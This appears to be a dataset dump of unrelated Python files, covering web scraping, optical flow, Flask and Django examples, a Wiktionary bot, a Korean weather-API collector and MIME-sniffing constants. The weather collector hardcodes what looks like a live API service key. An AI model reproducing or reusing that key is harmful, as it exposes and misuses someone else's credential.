text stringlengths 38 1.54M |
|---|
from import_modules import *
from jild_hadith_parsing import *

# Scrape every jild (volume) of a hadith book and dump each volume's
# chapter/hadith tree to a JSON file named after the book title.
book_jild_json = {}
all_jild_links = get_all_jild_links(book_url)
for jild_link in all_jild_links[:]:
    book_jild_jsons = []
    book_jild_json = {}
    print(jild_link)
    # protect_get_connection_error presumably retries on connection errors — TODO confirm.
    jild_response = protect_get_connection_error(url=jild_link)
    jild_soup = BeautifulSoup(jild_response.content, 'html5lib')
    book_title_text = get_book_title(jild_soup)
    book_jild_json['title'] = book_title_text
    book_jild_json = initialize_book_jild_json(book_jild_json)
    # Use the last '/'-separated component of the title as the output file name.
    file_name = book_title_text.split('/')[-1]
    main_div = jild_soup.find('div', class_='AllHadith').find_all('div')
    hadith_divs = get_all_hadith_divs(jild_soup)
    chapter_json = {}
    print(len(main_div))
    count = 0
    for cr_div in main_div:
        count += 1
        div_class = ' '.join(cr_div['class'])
        if div_class == 'chapter':
            print(f'{count}-----------------{div_class}')
            # A new chapter begins: flush the previous chapter (if any) first.
            if chapter_json:
                print(f'if -----------{chapter_json.keys()}')
                book_jild_json['children'].append(chapter_json)
                chapter_json = {}
            chapter_json["string"] = get_chapter_name(cr_div)
            chapter_json["heading"] = 3
            chapter_json["children"] = []
        elif div_class == "actualHadithContainer hadith_container_riyadussalihin":
            print(f'{count}-----------------{div_class}')
            hadith_json = get_hadith_json(cr_div)
            chapter_json["children"].append(hadith_json)
    # Flush the final chapter. NOTE(review): if the page had no chapter divs at
    # all, this appends an empty dict — confirm that is intended.
    book_jild_json['children'].append(chapter_json)
    book_jild_jsons.append(book_jild_json)
    print(f'{len(book_jild_jsons)}')
    print(f'{file_name}')
    # NOTE(review): mode 'a' appends a new JSON array on every run, which makes
    # the file invalid JSON after the first run — confirm 'w' was not intended.
    with open(f'All_Books/{file_name}.json', 'a') as outfile:
        json.dump(book_jild_jsons, outfile)
|
import os
import numpy as np
import pathlib
from imageio import imread
import cv2
indir = 'data/gray/'
outdir = 'data/flow/'
hsvdir = 'data/flowhsv/'
warpdir = 'data/warped/'
def draw_hsv(flow):
    """Render a dense optical-flow field as a BGR image.

    Hue encodes flow direction, value encodes (min-max normalized) magnitude,
    saturation is fixed at full.
    """
    height, width = flow.shape[:2]
    dx = flow[:, :, 0]
    dy = flow[:, :, 1]
    angle = np.arctan2(dy, dx) + np.pi
    magnitude = np.sqrt(dx * dx + dy * dy)
    hsv = np.zeros((height, width, 3), np.uint8)
    hsv[..., 0] = angle * (180 / np.pi / 2)  # OpenCV hue range is [0, 180)
    hsv[..., 1] = 255
    hsv[..., 2] = cv2.normalize(magnitude, None, 0, 255, cv2.NORM_MINMAX)
    return cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)
def warp_flow(img, flow):
    """Warp `img` backwards along `flow` using per-pixel bilinear remapping."""
    height, width = flow.shape[:2]
    # Build absolute sampling coordinates: pixel grid minus the flow vectors.
    coords = -flow
    coords[:, :, 0] += np.arange(width)
    coords[:, :, 1] += np.arange(height)[:, np.newaxis]
    return cv2.remap(img, coords, None, cv2.INTER_LINEAR)
# For every run directory under `indir`, compute dense optical flow between
# consecutive frames and save: raw flow (.npy), an HSV visualization, and the
# first frame warped by the flow (a sanity check of flow quality).
for rundir in sorted(os.listdir(indir)):
    infulldir = indir+rundir
    outfulldir = outdir+rundir
    hsvfulldir = hsvdir+rundir
    warpfulldir = warpdir+rundir
    infnames = [infulldir+"/"+fname for fname in sorted(os.listdir(infulldir))]
    # Flow files reuse the frame name with the extension swapped for .npy.
    outfnames = [outfulldir+"/"+fname[:-4]+".npy" for fname in sorted(os.listdir(infulldir))]
    hsvfnames = [hsvfulldir+"/"+fname for fname in sorted(os.listdir(infulldir))]
    warpfnames = [warpfulldir+"/"+fname for fname in sorted(os.listdir(infulldir))]
    # create output directory
    pathlib.Path(outfulldir).mkdir(parents=True, exist_ok=True)
    pathlib.Path(hsvfulldir).mkdir(parents=True, exist_ok=True)
    pathlib.Path(warpfulldir).mkdir(parents=True, exist_ok=True)
    # One flow field per consecutive frame pair (t, t+1).
    for t in range(len(infnames)-1):
        im1 = np.asarray(imread(infnames[t]))
        im2 = np.asarray(imread(infnames[t+1]))
        flow = cv2.calcOpticalFlowFarneback(im1, im2, None, 0.5, 3, 15, 3, 5, 1.2, 0)
        # save flow to numpy file
        np.save(outfnames[t], flow)
        # draw flow in HSV (magnitude and angle)
        flowhsv = draw_hsv(flow)
        cv2.imwrite(hsvfnames[t], flowhsv)
        im2w = warp_flow(im1, flow)
        # im2w = 255.*(im2w > 128) # make sure the image is binary
        cv2.imwrite(warpfnames[t], im2w)
# print min/max flow for normalization during training
IMIN = np.inf
IMAX = -np.inf
for rundir in sorted(os.listdir(outdir)):
    run_path = outdir + rundir
    for fname in sorted(os.listdir(run_path)):
        flow = np.load(run_path + "/" + fname)
        # Fold this file's extrema into the running global min/max.
        IMIN = min(IMIN, flow.min())
        IMAX = max(IMAX, flow.max())
print(IMIN, IMAX)
|
from javax.swing import *
def hello(event):
    # Swing ActionListener callback: fires when the button is pressed.
    print "Hello. I'm an event."

def test():
    """Build and show a minimal Swing window with a single button."""
    frame = JFrame("Hello Jython")
    # NOTE(review): `font=("Currier", 100, 60)` looks like a Tkinter-style tuple,
    # not a java.awt.Font; also "Currier" is likely a typo for "Courier" — confirm.
    button = JButton("Hello",font=("Currier", 100, 60), actionPerformed=hello)
    frame.add(button)
    frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE)
    frame.setSize(300, 300)
    # show() is the deprecated predecessor of setVisible(True).
    frame.show()

test()
|
#!/usr/bin/python
#-*- coding: utf-8 -*-
import urllib2
import json
import pprint
from cStringIO import StringIO
import datetime, time
import mysql.connector
from mysql.connector.errors import Error
from mysql.connector import errorcode
# Database connection settings are loaded from a JSON config file on disk.
with open('/home/admin/collect/db_config.json', 'r') as f:
    DB_CONFIG = json.loads( f.read() )

# Forecast grid coordinates ('x', 'y') and administrative area codes ('AreaNo')
# for districts of Pohang, keyed by the full Korean address string.
LOCATION_INFOS = {
    '경상북도 포항시 남구 구룡포읍':{'do':'경상북도','gu':'포항시남구','dong':'구룡포읍', 'x':'105', 'y':'94' ,'AreaNo':'4711125000'},
    '경상북도 포항시 남구 연일읍':{'do':'경상북도','gu':'포항시남구','dong':'연일읍', 'x':'102', 'y':'94' ,'AreaNo':'4711125300'},
    '경상북도 포항시 남구 오천읍':{'do':'경상북도','gu':'포항시남구','dong':'오천읍', 'x':'103', 'y':'93' ,'AreaNo':'4711125600'},
    '경상북도 포항시 남구 대송면':{'do':'경상북도','gu':'포항시남구','dong':'대송면', 'x':'102', 'y':'93' ,'AreaNo':'4711131000'},
    '경상북도 포항시 남구 동해면':{'do':'경상북도','gu':'포항시남구','dong':'동해면', 'x':'104', 'y':'94' ,'AreaNo':'4711132000'},
    '경상북도 포항시 남구 장기면':{'do':'경상북도','gu':'포항시남구','dong':'장기면', 'x':'105', 'y':'92' ,'AreaNo':'4711133000'},
    '경상북도 포항시 남구 호미곶면':{'do':'경상북도','gu':'포항시남구','dong':'호미곶면', 'x':'106', 'y':'96' ,'AreaNo':'4711135000'},
    '경상북도 포항시 남구 상대동':{'do':'경상북도','gu':'포항시남구','dong':'상대동', 'x':'102', 'y':'94' ,'AreaNo':'4711152500'},
    '경상북도 포항시 남구 해도동':{'do':'경상북도','gu':'포항시남구','dong':'해도동', 'x':'102', 'y':'94' ,'AreaNo':'4711154500'},
    '경상북도 포항시 남구 송도동':{'do':'경상북도','gu':'포항시남구','dong':'송도동', 'x':'102', 'y':'94' ,'AreaNo':'4711155000'},
    '경상북도 포항시 남구 청림동':{'do':'경상북도','gu':'포항시남구','dong':'청림동', 'x':'103', 'y':'94' ,'AreaNo':'4711156000'},
    '경상북도 포항시 남구 제철동':{'do':'경상북도','gu':'포항시남구','dong':'제철동', 'x':'103', 'y':'94' ,'AreaNo':'4711157000'},
    '경상북도 포항시 남구 효곡동':{'do':'경상북도','gu':'포항시남구','dong':'효곡동', 'x':'102', 'y':'94' ,'AreaNo':'4711158000'},
    '경상북도 포항시 남구 대이동':{'do':'경상북도','gu':'포항시남구','dong':'대이동', 'x':'102', 'y':'94' ,'AreaNo':'4711159000'},
    '경상북도 포항시 북구 흥해읍':{'do':'경상북도','gu':'포항시북구','dong':'흥해읍', 'x':'102', 'y':'96' ,'AreaNo':'4711325000'},
    '경상북도 포항시 북구 신광면':{'do':'경상북도','gu':'포항시북구','dong':'신광면', 'x':'100', 'y':'97' ,'AreaNo':'4711331000'},
    '경상북도 포항시 북구 청하면':{'do':'경상북도','gu':'포항시북구','dong':'청하면', 'x':'102', 'y':'98' ,'AreaNo':'4711332000'},
    '경상북도 포항시 북구 송라면':{'do':'경상북도','gu':'포항시북구','dong':'송라면', 'x':'102', 'y':'99' ,'AreaNo':'4711333000'},
    '경상북도 포항시 북구 기계면':{'do':'경상북도','gu':'포항시북구','dong':'기계면', 'x':'100', 'y':'95' ,'AreaNo':'4711334000'},
    '경상북도 포항시 북구 죽장면':{'do':'경상북도','gu':'포항시북구','dong':'죽장면', 'x':'97', 'y':'97' ,'AreaNo':'4711335000'},
    '경상북도 포항시 북구 기북면':{'do':'경상북도','gu':'포항시북구','dong':'기북면', 'x':'99', 'y':'96' ,'AreaNo':'4711336000'},
    '경상북도 포항시 북구 중앙동':{'do':'경상북도','gu':'포항시북구','dong':'중앙동', 'x':'102', 'y':'95' ,'AreaNo':'4711352000'},
    '경상북도 포항시 북구 양학동':{'do':'경상북도','gu':'포항시북구','dong':'양학동', 'x':'102', 'y':'94' ,'AreaNo':'4711363000'},
    '경상북도 포항시 북구 죽도동':{'do':'경상북도','gu':'포항시북구','dong':'죽도동', 'x':'102', 'y':'95' ,'AreaNo':'4711365500'},
    '경상북도 포항시 북구 용흥동':{'do':'경상북도','gu':'포항시북구','dong':'용흥동', 'x':'102', 'y':'95' ,'AreaNo':'4711366500'},
    '경상북도 포항시 북구 우창동':{'do':'경상북도','gu':'포항시북구','dong':'우창동', 'x':'102', 'y':'95' ,'AreaNo':'4711368000'},
    '경상북도 포항시 북구 두호동':{'do':'경상북도','gu':'포항시북구','dong':'두호동', 'x':'102', 'y':'95' ,'AreaNo':'4711369000'},
    '경상북도 포항시 북구 장량동':{'do':'경상북도','gu':'포항시북구','dong':'장량동', 'x':'102', 'y':'95' ,'AreaNo':'4711370000'},
    '경상북도 포항시 북구 환여동':{'do':'경상북도','gu':'포항시북구','dong':'환여동', 'x':'103', 'y':'95' ,'AreaNo':'4711371000'},
}

# KMA (Korea Meteorological Administration) API endpoints.
DATA_GO_URL = 'http://newsky2.kma.go.kr'
# Service base paths: living-weather index service and neighborhood forecast service.
SEVICE_LIST = {
    '생활기상지수조회서비스' : "iros/RetrieveLifeIndexService2",
    '동네예보정보조회서비스' : "service/SecndSrtpdFrcstInfoService2"
}
# Operation names within each service (keys are Korean operation labels).
DETAIL_FUNCTION = {
    '초단기실황조회' : 'ForecastGrib',
    '초단기예보조회' : 'ForecastTimeData',
    '동네예보조회' : 'ForecastSpaceData',
    '예보버전조회' : 'ForecastVersionCheck',
    '식중독지수' : 'getFsnLifeList',
    '체감온도' : 'getSensorytemLifeList',
    '열지수' : 'getHeatLifeList',
    '불쾌지수' : 'getDsplsLifeList',
    '동파가능지수' : 'getWinterLifeList',
    '자외선지수' : 'getUltrvLifeList',
    '대기오염확산지수' : 'getAirpollutionLifeList'
}
# Response field codes: a list of observation codes for the ultra-short-term
# report, and per-index codes for the life-index lookups.
CODE_INFO = {
    '초단기실황' : [ 'T1H', 'RN1', 'SKY', 'UUU', 'VVV', 'REH', 'PTY', 'LGT', 'VEC', 'WSD'],
    '식중독지수':'A01_2' ,
    '자외선지수':'A07' ,
    '체감온도':'A03' ,
    '열지수':'A05' ,
    '불쾌지수':'A06' ,
    '동파가능지수':'A08' ,
    '대기오염확산지수':'A09' ,
}
# NOTE(review): hardcoded, URL-encoded API credential — should live in
# db_config.json or an environment variable, not in source control.
SERVICE_KEY = "2GiBhujMz%2BTjpU7DGW5S08PybBafZ3d1ROrBwFCMcfQ2FszNe0QUpSN3LVA%2F%2FpNAkSXInsyr68yj%2FIte8pP%2FWQ%3D%3D"
SEPARATOR = ','
# strftime/strptime format used by the datetime helpers below.
INPUT_DATETIME_FORMAT = '%Y%m%d%H%M%S'
def insertWeather(cnx, insertQuery, updateQuery, checkQuery, keyList, dataList) :
    """Upsert one weather row.

    Runs checkQuery with keyList (expected to yield a single COUNT row);
    if the row exists runs updateQuery (data params first, key params last),
    otherwise runs insertQuery (key params first, data params last).
    Commits and closes the cursor on success.
    """
    cursor = cnx.cursor()
    cursor.execute(checkQuery, keyList)
    for cnt in cursor:
        if cnt[0] > 0 :
            # Existing row: SET-clause values come before the WHERE-clause keys.
            dataVal = dataList + keyList
            #print "updateQuery : %s : %s" %(updateQuery, str( dataVal ) )
            cursor.execute(updateQuery, dataVal )
        else :
            dataVal = keyList + dataList
            #print "insertQuery : %s : %s" %(insertQuery, str( dataVal ) )
            cursor.execute(insertQuery, dataVal )
    cnx.commit()
    cursor.close()
def datetimeAddHour( current, h ) :
    """Return `current` shifted by `h` hours, formatted per INPUT_DATETIME_FORMAT."""
    shifted = current + datetime.timedelta(hours=h)
    return shifted.strftime(INPUT_DATETIME_FORMAT)
def getDateFormat( base_date ) :
    """Reformat a 'YYYYMMDD' string as 'YYYY-MM-DD'."""
    parsed = datetime.datetime.strptime(base_date, '%Y%m%d')
    return parsed.strftime('%Y-%m-%d')
def getTimeFormat( base_time ) :
    """Reformat an 'HHMM' string as 'HH:MM:SS.ffffff' (seconds/microseconds zero)."""
    parsed = datetime.datetime.strptime(base_time, '%H%M')
    return parsed.strftime('%H:%M:%S.%f')
def getNowFormat( dateformat='%Y-%m-%d %H:%M:%S', prevHour=0 ) :
    """Format the current local time; prevHour > 0 shifts that many hours into the past."""
    moment = datetime.datetime.now()
    if prevHour != 0 :
        moment -= datetime.timedelta(hours=prevHour)
    return moment.strftime( dateformat )
def print_dic( dic ) :
    """Print each key/value pair of `dic` on its own line."""
    for key, value in dic.items():
        print( "%s : %s" %( key, value ) )
|
import heapq
from collections import defaultdict
def dijkstra(graph, start):
    """Single-source shortest path distances over a dict-of-dicts weighted graph."""
    distances = dict.fromkeys(graph, float('inf'))
    distances[start] = 0
    pending = [[0, start]]
    while pending:
        dist_here, node = heapq.heappop(pending)
        # Skip stale queue entries that were superseded by a shorter path.
        if distances[node] < dist_here:
            continue
        for neighbor, weight in graph[node].items():
            candidate = dist_here + weight
            if candidate < distances[neighbor]:
                distances[neighbor] = candidate
                heapq.heappush(pending, [candidate, neighbor])
    return distances
def solution(n, s, a, b, fares):
    """Minimum total fare: share a taxi from s to some midpoint, then split to a and b."""
    graph = defaultdict(dict)
    for u, v, w in fares:
        # Fares are bidirectional.
        graph[u][v] = w
        graph[v][u] = w
    from_start = dijkstra(graph, s)
    # Baseline: part ways immediately at s.
    best = from_start[a] + from_start[b]
    for mid in range(1, n + 1):
        from_mid = dijkstra(graph, mid)
        total = from_start.get(mid, float('inf')) + from_mid[a] + from_mid[b]
        best = min(best, total)
    return best
from flask import Flask
from flask import render_template, request
app = Flask(__name__)
@app.before_request
def antes_request():
    # Runs before every request is dispatched to its view.
    print (" Mensaje Antes de Responder la Petición")

@app.after_request
def despues_reques(response):
    # Runs after each view; must return the (possibly modified) response.
    print (" Mensaje despues de Resolver la Solicitud en el Servidor")
    return response
@app.route('/')
def index():
    """Home page: render index.html with sample user/course data."""
    page_title = 'Python-Web'
    username = 'Dieguito'
    course = 'De Codigo Facilito Python-Web'
    premium = False
    courses = ('Python', 'Perl', 'Java', 'Django')
    return render_template(
        'index.html',
        username=username,
        title=page_title,
        name_curso=course,
        is_premium=premium,
        list_cursos=courses,
    )
# Example of dynamic URL segments.
@app.route('/usuario/<Apellido>/<Nombre>/<int:edad>')
def usuario(Apellido, Nombre, edad):
    """Greet a user built from path segments; `edad` is converted to int by the route."""
    return f'Hola {Nombre} {Apellido} de: {edad} Año'
# Plain helper, also handed to templates as a callable.
def suma(val1, val2):
    """Return the sum (or concatenation) of the two values."""
    result = val1 + val2
    return result
# Route that passes a plain function into the template context.
@app.route('/suma')
def suma_template():
    """Render suma.html, exposing the `suma` helper for use inside the template."""
    context = {
        'val1': 10,
        'val2': 30,
        'funcion': suma,
        'title': 'Python-Web-Suma',
        'username': 'Dieguito',
    }
    return render_template('suma.html', **context)
# Route reading query-string parameters.
@app.route('/datos')
def Datos():
    # request.args.get(key, default): query parameter, or '' when absent.
    nombre = request.args.get('nombre' , '')
    name_curso = request.args.get('curso' , '')
    return 'Listado Pasado : ' + nombre + ' ' + name_curso
# About route.
@app.route('/about')
def about():
    print (" Mensaje desde la función ABOUT")
    return render_template('about.html')

if __name__ == '__main__':
    # Development server on port 9000 with the debugger/reloader enabled.
    app.run(debug=True, port=9000)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import blib
from blib import getparam, rmparam, msg, errmsg, errandmsg, site
import pywikibot, re, sys, argparse
import rulib
def process_page(index, page, contents, verbose, comment):
  """Replace manually formatted derived-verb tables with {{ru-derived verbs}}.

  `contents` holds replacement tables separated by lines of dashes; each table
  replaces one {{top2}}/{{der-top}} ... {{bottom*}} block found under a
  "Derived terms" header in the page's Russian section.

  Returns (newtext, comment) on success, or None on failure — in which case
  the would-be templates are dumped to the log for manual handling.
  """
  pagetitle = str(page.title())
  def pagemsg(txt):
    msg("Page %s %s: %s" % (index, pagetitle, txt))
  def errandpagemsg(txt):
    errandmsg("Page %s %s: %s" % (index, pagetitle, txt))
  if verbose:
    # BUG FIX: previously referenced `pagename`, which is not defined in this
    # function and only resolved through a leaked module-level loop variable;
    # use the local `pagetitle` instead.
    pagemsg("For [[%s]]:" % pagetitle)
    pagemsg("------- begin text --------")
    msg(contents.rstrip("\n"))
    msg("------- end text --------")
  if not contents.endswith("\n"):
    contents += "\n"
  # Replacement tables are separated by lines consisting of dashes.
  tables = re.split(r"^--+\n", contents, 0, re.M)
  def table_to_template(table_index):
    # Convert one raw table into {{ru-derived verbs|...}} template lines,
    # skipping '#'-prefixed comment lines.
    outlines = []
    outlines.append("{{ru-derived verbs")
    table_lines = tables[table_index].rstrip("\n").split("\n")
    for table_line in table_lines:
      if not table_line.startswith("#"):
        outlines.append("|" + table_line)
    outlines.append("}}")
    return outlines
  def do_process():
    # Walk the Russian section line by line, replacing each well-formed
    # manual table with the corresponding generated template.
    if not page.exists():
      pagemsg("WARNING: Page doesn't exist")
      return
    else:
      text = page.text
    retval = blib.find_modifiable_lang_section(text, "Russian", pagemsg, force_final_nls=True)
    if retval is None:
      return
    sections, j, secbody, sectail, has_non_lang = retval
    outlines = []
    curtab_index = 0
    lines = secbody.split("\n")
    # State machine over the manual-table structure:
    # {{top2}}/{{der-top}} -> ''imperfective''/''perfective'' -> {{bottom*}}.
    saw_top = False
    saw_impf = False
    saw_pf = False
    in_table = False
    header = None
    for line in lines:
      m = re.search("^==+(.*?)==+$", line)
      if m:
        header = m.group(1)
        outlines.append(line)
        continue
      if line in ["{{top2}}", "{{der-top}}"] and header == "Derived terms":
        if saw_top:
          pagemsg("WARNING: Saw {{top2}}/{{der-top}} line twice")
          return
        saw_top = True
        continue
      if line in ["''imperfective''", "''perfective''"]:
        if header == "Conjugation":
          # Conjugation sections legitimately contain these labels; keep them.
          outlines.append(line)
          continue
        if header != "Derived terms":
          pagemsg("WARNING: Apparent derived-terms table in header '%s' rather than 'Derived terms'" % header)
          return
        if not saw_top:
          pagemsg("WARNING: Saw imperfective/perfective line without {{top2}}/{{der-top}} line")
          return
        if line == "''imperfective''":
          if saw_impf:
            pagemsg("WARNING: Saw imperfective table portion twice")
            return
          saw_impf = True
        else:
          if saw_pf:
            pagemsg("WARNING: Saw perfective table portion twice")
            return
          saw_pf = True
        in_table = True
        continue
      elif line in ["{{bottom2}}", "{{bottom}}", "{{der-bottom}}"]:
        if in_table:
          if not saw_top or not saw_impf or not saw_pf:
            pagemsg("WARNING: Didn't see top, imperfective header or perfective header; saw_top=%s, saw_impf=%s, saw_pf=%s"
              % (saw_top, saw_impf, saw_pf))
            return
          if curtab_index >= len(tables):
            pagemsg("WARNING: Too many existing manually-formatted tables, saw %s existing table(s) but only %s replacement(s)"
              % (curtab_index + 1, len(tables)))
            return
          # Emit the generated template in place of the manual table.
          outlines.extend(table_to_template(curtab_index))
          curtab_index += 1
          saw_top = False
          saw_impf = False
          saw_pf = False
          in_table = False
      elif in_table:
        # Drop the manual table's content lines; the template replaces them.
        continue
      else:
        outlines.append(line)
    if curtab_index != len(tables):
      pagemsg("WARNING: Wrong number of existing manually-formatted tables, saw %s existing table(s) but %s replacement(s)"
        % (curtab_index, len(tables)))
      return
    secbody = "\n".join(outlines)
    sections[j] = secbody.rstrip("\n") + sectail
    return "".join(sections), comment
  retval = do_process()
  if retval is None:
    # Replacement failed: dump the templates so they can be applied manually.
    for table_index in range(len(tables)):
      msg("------------------ Table #%s -----------------------" % (table_index + 1))
      if len(tables) > 1:
        msg("=====Derived terms=====")
      else:
        msg("====Derived terms====")
      outlines = table_to_template(table_index)
      msg("\n".join(outlines))
  return retval
if __name__ == "__main__":
    parser = blib.create_argparser("Push new Russian derived-verb tables from infer_ru_derverb_prefixes.py",
        suppress_start_end=True)
    parser.add_argument('files', nargs='*', help="Files containing directives.")
    parser.add_argument("--direcfile", help="File containing entries.")
    parser.add_argument("--comment", help="Comment to use.", required=True)
    parser.add_argument("--pagefile", help="File to restrict list of pages done.")
    args = parser.parse_args()
    # Optional whitelist of page titles to process.
    if args.pagefile:
        pages = set(blib.yield_items_from_file(args.pagefile))
    else:
        pages = set()
    if args.direcfile:
        # Mode 1: a single directive file containing (index, pagename, text, comment) entries.
        lines = open(args.direcfile, "r", encoding="utf-8")
        index_pagename_text_comment = blib.yield_text_from_find_regex(lines, args.verbose)
        for _, (index, pagename, text, comment) in blib.iter_items(index_pagename_text_comment,
            get_name=lambda x:x[1], get_index=lambda x:x[0]):
            if pages and pagename not in pages:
                continue
            # Combine the per-entry comment with the command-line comment.
            if comment:
                comment = "%s; %s" % (comment, args.comment)
            else:
                comment = args.comment
            # Closure over this iteration's `text`/`comment`; do_edit calls it
            # immediately within the iteration, so late binding is not an issue here.
            def do_process_page(page, index, parsed):
                return process_page(index, page, text, args.verbose, comment)
            blib.do_edit(pywikibot.Page(site, pagename), index, do_process_page,
                save=args.save, verbose=args.verbose, diff=args.diff)
    else:
        # Mode 2: one .der file per page; the page name is the decomposed file name.
        for index, extfn in enumerate(args.files):
            lines = list(blib.yield_items_from_file(extfn))
            pagename = re.sub(r"\.der$", "", rulib.recompose(extfn))
            def do_process_page(page, index, parsed):
                return process_page(index, page, "\n".join(lines), args.verbose, args.comment)
            blib.do_edit(pywikibot.Page(site, pagename), index + 1, do_process_page,
                save=args.save, verbose=args.verbose, diff=args.diff)
|
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class UserProfileInfo(models.Model):
    # One profile row per auth user; deleted together with the user.
    user=models.OneToOneField(User,on_delete=models.CASCADE)
    first_name=models.CharField(max_length=256,blank=False,default="First Name")
    last_name=models.CharField(blank=True,max_length=256,default="Last Name")
    # null=True allows several rows without an email despite unique=True.
    email=models.EmailField(blank=True,unique=True,null=True,max_length=256)
    #additional
    place=models.CharField(blank=False,max_length=256)
    #profile_pic=models.ImageField(upload_to='profile_pic',blank=True)
    def __str__(self):
        # Show the linked auth username in admin/listings.
        return self.user.username
class Product(models.Model):
    # BUG FIX: `product_id=models.AutoField` assigned the Field *class* rather
    # than an instance, so Django silently ignored it and auto-created an
    # implicit `id` primary key. Instantiate it as the primary key, matching
    # Order.order_id below. NOTE: requires a schema migration.
    product_id=models.AutoField(primary_key=True)
    product_name=models.CharField(max_length=50,default="")
    # Price kept as text; switch to DecimalField if arithmetic is ever needed.
    product_price=models.CharField(max_length=20,default="0")
    product_pic=models.ImageField(upload_to='images/',blank=True)
    def __str__(self):
        # Show the product name in admin/listings.
        return self.product_name
class Order(models.Model):
    # Cart contents serialized as a JSON string (no JSONField used).
    items_json=models.CharField(max_length=5000,default="")
    order_id=models.AutoField(primary_key=True)
    name=models.CharField(max_length=100,default="")
    email=models.CharField(max_length=100,default="")
    address=models.CharField(max_length=100,default="")
    city=models.CharField(max_length=100,default="")
    state=models.CharField(max_length=100,default="")
    zip_code=models.CharField(max_length=56,default="")
    # NOTE(review): max_length=10 assumes local 10-digit numbers — confirm.
    phone=models.CharField(max_length=10,default="")
    def __str__(self):
        # Show the customer name in admin/listings.
        return self.name
class OrderUpdate(models.Model):
    update_id = models.AutoField(primary_key=True)
    # BUG FIX: default was "" (an empty string) on an IntegerField, which fails
    # validation and database insertion; use an integer default instead.
    order_id = models.IntegerField(default=0)
    update_desc = models.CharField(max_length=5000)
    timestamp = models.DateField(auto_now_add=True)
    def __str__(self):
        # Short preview of the update text for admin/listings.
        return self.update_desc[0:7] + "..."
|
# Swap a and b using a temporary variable.
a = 5
b = 10
c = a
a = b
b = c
# Bare expressions only echo values in a REPL/notebook; they have no effect in a script.
a
b
# String repetition: prints "444" (not 12).
four = "4"
print(four*3)
my_name = "student"
print("Hi, " + my_name)
# age is a string here, so `+` performs concatenation.
age = "15"
print("I am " + age + " years old")
# Numeric multiplication: prints 20.
score = 4
count = 5
total = score * count
print(total)
|
def passo1(p1):
    """Return a closure that prints the dash-decorated first step beside its own argument."""
    decorated = f'--{p1}--'

    def passo2(p2):
        print( f'{decorated} e {p2}')

    return passo2

# Usage examples:
# retorno = passo1('Abrir a porta'); retorno('Entrar no quarto')
# passo1('Abrir a porta')('Entrar no quarto')
def verifica_usuario_logado(funcao):
    """Decorator: log a login-check message before running `funcao` and 'FIM' after."""
    def verifica():
        print('[Antes vamos verifivar se o usuário está logado]')
        resultado = funcao()
        print('[FIM]')
        return resultado
    return verifica
@verifica_usuario_logado
def salvar_postagem():
    # Simulated "save post" action; the decorator adds login-check logging.
    print('....[executando]')
    print('Postagem criada')

@verifica_usuario_logado
def salvar_comentario():
    # Simulated "save comment" action.
    print('....[executando]')
    print('Comentário criado')

salvar_comentario()
|
from typing import Optional, Set, Tuple
#: Section 3
#: https://mimesniff.spec.whatwg.org/commit-snapshots/609a3a3c935fbb805b46cf3d90768d695a1dcff2/#terminology # noqa: E501
# Control bytes whose presence marks a resource as binary:
# 0x00-0x08, 0x0B, 0x0E-0x1A and 0x1C-0x1F (i.e. C0 controls minus whitespace/ESC).
BINARY_BYTES = tuple(
    bytes([code])
    for code in (*range(0x00, 0x09), 0x0B, *range(0x0E, 0x1B), *range(0x1C, 0x20))
)
# Whitespace bytes per the spec: tab, newline, form feed, carriage return, space.
WHITESPACE_BYTES = {b"\t", b"\n", b"\x0c", b"\r", b" "}
#: Section 4.6
#: https://mimesniff.spec.whatwg.org/commit-snapshots/609a3a3c935fbb805b46cf3d90768d695a1dcff2/#mime-type-groups # noqa: E501
# MIME types belonging to the "font", "archive" and "JavaScript" groups.
FONT_TYPES = [
    b"application/" + subtype
    for subtype in (
        b"font-cff",
        b"font-off",
        b"font-sfnt",
        b"font-ttf",
        b"font-woff",
        b"vnd.ms-fontobject",
        b"vnd.ms-opentype",
    )
]
ARCHIVE_TYPES = [
    b"application/" + subtype for subtype in (b"x-rar-compressed", b"zip", b"x-gzip")
]
JAVASCRIPT_TYPES = (
    [b"application/" + s for s in (b"ecmascript", b"javascript", b"x-ecmascript", b"x-javascript")]
    + [b"text/" + s for s in (b"ecmascript", b"javascript")]
    + [b"text/javascript1." + v for v in (b"0", b"1", b"2", b"3", b"4", b"5")]
    + [b"text/" + s for s in (b"jscript", b"livescript", b"x-ecmascript", b"x-javascript")]
)
#: Section 5.1, step 2
#: https://mimesniff.spec.whatwg.org/commit-snapshots/609a3a3c935fbb805b46cf3d90768d695a1dcff2/#interpreting-the-resource-metadata # noqa: E501
_APACHE_TYPES = [
b"text/plain",
b"text/plain; charset=ISO-8859-1",
b"text/plain; charset=iso-8859-1",
b"text/plain; charset=UTF-8",
]
#: Section 6.1, step 1
#: https://mimesniff.spec.whatwg.org/commit-snapshots/609a3a3c935fbb805b46cf3d90768d695a1dcff2/#matching-an-image-type-pattern # noqa: E501
# Each entry: (byte pattern, pattern mask, leading bytes to ignore, sniffed MIME type).
# Mask byte 0x00 means "any byte is accepted at this position".
IMAGE_PATTERNS = (
    (b"\x00\x00\x01\x00", b"\xff" * 4, None, b"image/x-icon"),   # ICO
    (b"\x00\x00\x02\x00", b"\xff" * 4, None, b"image/x-icon"),   # CUR
    (b"BM", b"\xff\xff", None, b"image/bmp"),
    (b"GIF87a", b"\xff" * 6, None, b"image/gif"),
    (b"GIF89a", b"\xff" * 6, None, b"image/gif"),
    # RIFF container: 4-byte size field is ignored before the WEBPVP tag.
    (b"RIFF\x00\x00\x00\x00WEBPVP", b"\xff" * 4 + b"\x00" * 4 + b"\xff" * 6, None, b"image/webp"),
    (b"\x89PNG\r\n\x1a\n", b"\xff" * 8, None, b"image/png"),
    (b"\xff\xd8\xff", b"\xff" * 3, None, b"image/jpeg"),
)
#: Section 6.2, step 1
#: https://mimesniff.spec.whatwg.org/commit-snapshots/609a3a3c935fbb805b46cf3d90768d695a1dcff2/#matching-an-audio-or-video-type-pattern # noqa: E501
# Same (pattern, mask, ignored leading bytes, MIME type) layout as IMAGE_PATTERNS.
AUDIO_VIDEO_PATTERNS = (
    (b".snd", b"\xff" * 4, None, b"audio/basic"),
    # IFF container: 4-byte size field is ignored between FORM and AIFF.
    (b"FORM\x00\x00\x00\x00AIFF", b"\xff" * 4 + b"\x00" * 4 + b"\xff" * 4, None, b"audio/aiff"),
